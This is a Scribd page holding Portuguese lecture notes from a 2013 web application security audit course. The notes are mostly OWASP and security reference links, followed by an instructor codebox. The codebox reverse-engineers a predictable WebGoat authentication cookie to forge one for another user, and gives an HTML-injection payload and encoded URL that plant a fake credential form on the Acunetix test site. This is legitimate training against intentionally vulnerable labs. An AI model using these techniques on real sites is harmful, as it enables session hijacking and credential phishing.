Scribd Logo
Upload

Welcome to Scribd!

  • Anotações Aula2 Auditoria em Aplicacoes Web EAD

    Uploaded by

    padawantse
    11 views6 pages
    Anotações Aula2 Auditoria Em Aplicacoes Web EAD

    Original Title

    Anotações Aula2 Auditoria Em Aplicacoes Web EAD

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    Anotações Aula2 Auditoria Em Aplicacoes Web EAD

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    11 views6 pages

    Anotações Aula2 Auditoria em Aplicacoes Web EAD

    Uploaded by

    padawantse
    Anotações Aula2 Auditoria Em Aplicacoes Web EAD

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 6

    Anotaes

    Curso Auditoria de Segurana em Aplicaes Web EAD Aula 2 Julho de 2013

    OWASP Broken Web Applications Project


    https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project

    Projeto OWASP Webgoat


    https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project

    OWASP Top 10 2013 - A2 Quebra de Autenticao / Sesso


    https://www.owasp.org/index.php/Top_10_2013-A2-
    Broken_Authentication_and_Session_Management

    Session ID
    http://searchsoftwarequality.techtarget.com/definition/session-ID

    Autenticao
    http://www.tecmundo.com.br/seguranca/1971-o-que-e-autenticacao-.htm

    Protocolo HTTP
    http://simplesideias.com.br/entendendo-um-pouco-mais-sobre-o-protocolo-http

    Autenticao HTTP:
    http://technet.microsoft.com/pt-br/library/cc441713.aspx
    RFC 2617 - Autenticao HTTP
    http://tools.ietf.org/html/rfc2617

    Cartilha de Criptografia Cert.br


    http://cartilha.cert.br/criptografia/

    PCI DSS
    http://imasters.com.br/artigo/12196/seguranca/pci-dss-entenda-como-funciona-a-norma-de-
    seguranca-de-transacoes-eletronicas/

    NIST - National Institute of Standards and Technology


    www.nist.gov/

    Hash criptogrfico e desenvolvimento do padro SHA-3


    http://csrc.nist.gov/groups/ST/hash/

    MD5 compromete potencialmente segurana SSL


    http://www.infoq.com/br/news/2009/01/MD5-Unsecure

    Key Signing Party


    https://en.wikipedia.org/wiki/Key_signing_party

    Autoridade certificadora
    http://serasa.certificadodigital.com.br/perguntas-frequentes/o-que-e-a-autoridade-certificadora-
    ac/

    Hash
    http://www.techtudo.com.br/artigos/noticia/2012/07/o-que-e-hash.html

    Clavis Webinar # 16 Ataques de Fora Bruta


    http://www.blog.clavis.com.br/webinar-16-ataques-de-forca-bruta-metodo-dicionario-hibridos-e-
    rainbow-tables/
    tamperdata
    http://tamperdata.mozdev.org/

    Hashs de senhas do LinkedIn, eHarmony e Last.fm vazam


    http://g1.globo.com/platb/seguranca-digital/2012/06/11/entenda-o-vazamento-de-senhas-do-
    linkedin-do-eharmoney-e-do-last-fm/

    O que SSL
    http://www.techtudo.com.br/artigos/noticia/2012/01/o-que-e-ssl.html

    CAPTCHA
    http://www.tecmundo.com.br/curiosidade/2861-o-que-e-captcha-.htm

    Como mdias sociais revolucionaram ataques de fora bruta - Apresentao Henrique Soares
    Clavis no FISL 2013
    http://www.slideshare.net/clavissecurity/entendendo-como-as-mdias-socias-revolucionaram-os-
    ataques-de-fora-bruta

    Cross Site Scripting XSS


    http://www.acunetix.com/websitesecurity/xss/

    Apache
    http://www.apache.org/

    Acunetix
    http://www.acunetix.com/

    Cross User Defacement


    https://www.owasp.org/index.php/Cross-User_Defacement

    Pgina vulnervel acunetix ASP


    http://testasp.vulnweb.com/
    OWASP Top 10 2013 A3 Cross Site Scripting
    https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)

    XSS Prevention Cheat Sheet


    https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

    OWASP Top 10 2013 A4 Referncia Direta a Objetos


    https://www.owasp.org/index.php/Top_10_2013-A4-Insecure_Direct_Object_References

    OWASP Top 10 2013 A5 Falhas de Configurao


    https://www.owasp.org/index.php/Top_10_2013-A5-Security_Misconfiguration

    Web Application Firewall


    https://www.owasp.org/index.php/Web_Application_Firewall

    Codebox do Instrutor
    WEBGOAT
    Session Management Flaws

    Usurio: Webgoat
    AuthCookie 65432ubphcfx
    JSESSIONID 826AC00353A7F48A1614102B042F02AC

    Usurio: Aspect
    AuthCookie 65432udfqtb
    JSESSIONID 826AC00353A7F48A1614102B042F02AC

    Analizando AuthCookie
    65432ubphcfx
    65432udfqtb
    Palavra invertida com incremento de 1 em cada letra
    Webgoat -> ubphcfx
    aspect -> udfqtb
    alice -> ecila -> fdjmb

    Cdigos para utilizar na pgina vulnervel ASP do Acunetix


    Cdigo para colocar no campo de busca
    <br><br>Entre aqui com suas credenciais:<form
    action="destination.asp"><table><tr><td>Nome:</td><td><input type=text length=20
    name=nome></td></tr><tr><td>Senha:</td><td><input type=text length=20
    name=senha></td></tr></table><input type=submit value=Acessar></form>

    URL com a vulnerabilidade explorada


    http://testasp.vulnweb.com/search.asp?tfSearch=%3Cbr%3E%3Cbr
    %3EEntre+aqui+com+suas+credenciais%3A%3Cform+action%3D%22destination.asp%22%3E
    %3Ctable%3E%3Ctr%3E%3Ctd%3ENome%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput+type
    %3Dtext+length%3D20+name%3Dnome%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3Ctd
    %3ESenha%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput+type%3Dtext+length%3D20+name
    %3Dsenha%3E%3C%2Ftd%3E%3C%2Ftr%3E%3C%2Ftable%3E%3Cinput+type
    %3Dsubmit+value%3DAcessar%3E%3C%2Fform%3E+

    You might also like